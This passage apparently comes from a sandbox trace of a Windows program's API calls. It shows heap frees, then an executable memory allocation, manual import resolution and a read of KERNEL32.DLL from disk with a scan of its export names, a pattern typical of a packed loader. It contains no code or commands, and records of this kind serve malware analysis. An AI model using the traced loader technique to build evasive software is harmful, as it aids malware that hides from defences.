lpMem=0x25d96b0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x25ec8c0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x25ffad0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2612ce0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2625ef0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2639100 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x264c310 | out: hHeap=0x580000) returned 1 [0163.501] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x265f520 | out: hHeap=0x580000) returned 1 [0163.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2672730 | out: hHeap=0x580000) returned 1 [0163.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2685940 | out: hHeap=0x580000) returned 1 [0163.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2698b50 | out: hHeap=0x580000) returned 1 [0163.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x26abd60 | out: hHeap=0x580000) returned 1 [0163.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x26bef70 | out: hHeap=0x580000) returned 1 [0163.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x26d2180 | out: hHeap=0x580000) returned 1 [0163.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x26e5390 | out: hHeap=0x580000) returned 1 [0163.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x26f85a0 | out: hHeap=0x580000) returned 1 [0163.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x270b7b0 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x271e9c0 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2731bd0 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2744de0 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2757ff0 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x276b200 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x277e410 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2791620 | out: hHeap=0x580000) returned 1 [0163.508] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x27a4830 | out: hHeap=0x580000) returned 1 [0163.516] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x27b7a40 | out: hHeap=0x580000) returned 1 [0163.516] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x27cac50 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x27dde60 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x27f1070 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2804280 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2817490 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x282a6a0 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x283d8b0 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2850ac0 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2863cd0 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2876ee0 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x288a0f0 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x289d300 | out: hHeap=0x580000) returned 1 [0163.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x28b0510 | out: hHeap=0x580000) returned 1 [0163.523] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x28c3720 | out: hHeap=0x580000) returned 1 [0163.523] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x28d6930 | out: hHeap=0x580000) returned 1 [0163.523] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x28e9b40 | out: hHeap=0x580000) returned 1 [0163.523] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x28fcd50 | out: hHeap=0x580000) returned 1 [0163.525] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x290ff60 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2923170 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2936380 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2949590 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x295c7a0 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x296f9b0 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2982bc0 | out: hHeap=0x580000) returned 1 [0163.526] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2995dd0 | out: hHeap=0x580000) returned 1 [0163.527] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x29a8fe0 | out: hHeap=0x580000) returned 1 [0163.527] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x29bc1f0 | out: hHeap=0x580000) returned 1 [0163.639] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x29cf400 | out: hHeap=0x580000) returned 1 [0163.639] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x29e2610 | out: hHeap=0x580000) returned 1 [0163.640] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x29f5820 | out: hHeap=0x580000) returned 1 [0163.640] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a08a30 | out: hHeap=0x580000) returned 1 [0163.640] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a1bc40 | out: hHeap=0x580000) returned 1 [0163.641] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a2ee50 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a42060 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a55270 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a7b690 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2a8e8a0 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2aa1ab0 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ab4cc0 | out: hHeap=0x580000) returned 1 [0163.642] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ac7ed0 | out: hHeap=0x580000) returned 1 [0163.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2adb0e0 | out: hHeap=0x580000) returned 1 [0163.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2aee2f0 | out: hHeap=0x580000) returned 1 [0163.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b01500 | out: hHeap=0x580000) returned 1 [0163.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b14710 | out: hHeap=0x580000) returned 1 [0163.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b27920 | out: hHeap=0x580000) returned 1 [0163.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b3ab30 | out: hHeap=0x580000) returned 1 [0163.648] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b4dd40 | out: hHeap=0x580000) returned 1 [0163.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b60f50 | out: hHeap=0x580000) returned 1 [0163.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b74160 | out: hHeap=0x580000) returned 1 [0163.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b87370 | out: hHeap=0x580000) returned 1 [0163.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2b9a580 | out: hHeap=0x580000) returned 1 [0163.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2bad790 | out: hHeap=0x580000) returned 1 [0163.650] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2bc09a0 | out: hHeap=0x580000) returned 1 [0163.650] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2bd3bb0 | out: hHeap=0x580000) returned 1 [0163.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2be6dc0 | out: hHeap=0x580000) returned 1 [0163.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2bf9fd0 | out: hHeap=0x580000) returned 1 [0163.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c0d1e0 | out: hHeap=0x580000) returned 1 [0163.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c203f0 | out: hHeap=0x580000) returned 1 [0163.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c33600 | out: hHeap=0x580000) returned 1 [0163.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c46810 | out: hHeap=0x580000) returned 1 [0163.655] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c59a20 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c6cc30 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c7fe40 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2c93050 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ca6260 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cb9470 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ccc680 | out: hHeap=0x580000) returned 1 [0163.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cdf890 | out: hHeap=0x580000) returned 1 [0163.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf2aa0 | out: hHeap=0x580000) returned 1 [0163.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d05cb0 | out: hHeap=0x580000) returned 1 [0163.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d18ec0 | out: hHeap=0x580000) returned 1 [0163.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d2c0d0 | out: hHeap=0x580000) returned 1 [0163.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d3f2e0 | out: hHeap=0x580000) returned 1 [0163.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d524f0 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d65700 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2d78910 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2da0080 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2db3290 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2dc64a0 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2dd96b0 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2dec8c0 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2dffad0 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e12ce0 | out: hHeap=0x580000) returned 1 [0163.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e25ef0 | out: hHeap=0x580000) returned 1 [0163.671] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e39100 | out: hHeap=0x580000) returned 1 [0163.676] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e4c310 | out: hHeap=0x580000) returned 1 [0163.677] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e5f520 | out: hHeap=0x580000) returned 1 [0163.677] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e72730 | out: hHeap=0x580000) returned 1 [0163.677] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e85940 | out: hHeap=0x580000) returned 1 [0163.677] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2e98b50 | out: hHeap=0x580000) returned 1 [0163.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2eabd60 | out: hHeap=0x580000) returned 1 [0163.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ebef70 | out: hHeap=0x580000) returned 1 [0163.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ed2180 | out: hHeap=0x580000) returned 1 [0163.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ee5390 | out: hHeap=0x580000) returned 1 [0163.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ef85a0 | out: hHeap=0x580000) returned 1 [0163.681] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f0b7b0 | out: hHeap=0x580000) returned 1 [0163.760] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f1e9c0 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f31bd0 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f44de0 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f57ff0 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f6b200 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f7e410 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2f91620 | out: hHeap=0x580000) returned 1 [0163.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2fa4830 | out: hHeap=0x580000) returned 1 [0163.765] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2fb7a40 | out: hHeap=0x580000) returned 1 [0163.765] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2fcac50 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2fdde60 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2ff1070 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x3004280 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x3017490 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x302a6a0 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x303d8b0 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x3050ac0 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x3063cd0 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x3076ee0 | out: hHeap=0x580000) returned 1 [0163.766] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x308a0f0 | out: hHeap=0x580000) returned 1 [0163.770] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x309d300 | out: hHeap=0x580000) returned 1 [0163.772] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x30b0510 | out: hHeap=0x580000) returned 1 [0163.775] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x30c3720 | out: hHeap=0x580000) returned 1 [0165.226] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0165.231] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0165.232] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0165.233] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0165.233] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0165.233] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0165.233] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0165.234] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0165.235] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0165.235] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0165.235] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0165.235] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0165.235] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0165.235] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0165.236] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0165.236] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0165.236] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0165.236] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0165.236] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0165.237] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0165.237] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0165.237] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5adb40 | out: hHeap=0x580000) returned 1 [0165.237] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0165.242] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x590630 | out: hHeap=0x580000) returned 1 [0165.245] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0165.245] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0165.245] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0165.246] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0165.246] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0165.246] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0165.248] GetProcessHeap () returned 0x580000 [0165.248] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x68) returned 0x588d40 [0165.249] GetProcessHeap () returned 0x580000 [0165.249] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5992e0 [0165.250] GetProcessHeap () returned 0x580000 [0165.250] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x48) returned 0x590b30 [0165.250] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0165.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0165.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0165.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0165.250] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0165.251] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0165.251] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0165.251] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0165.251] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0165.251] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0165.251] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0165.251] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0165.612] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0165.612] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0165.612] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0165.613] GetProcessHeap () returned 0x580000 [0165.613] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xac430) returned 0x5ac5f0 [0165.615] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0165.615] ReadFile (in: hFile=0x134, lpBuffer=0x5ac5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x5ac5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0165.629] CloseHandle (hObject=0x134) returned 1 [0165.630] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0165.639] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0165.639] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0165.639] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0165.639] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0165.639] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0165.639] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0165.639] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0165.640] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0165.640] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0165.641] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0165.641] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0165.642] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0165.642] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0165.642] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0165.642] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0165.642] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0165.642] lstrcmpA 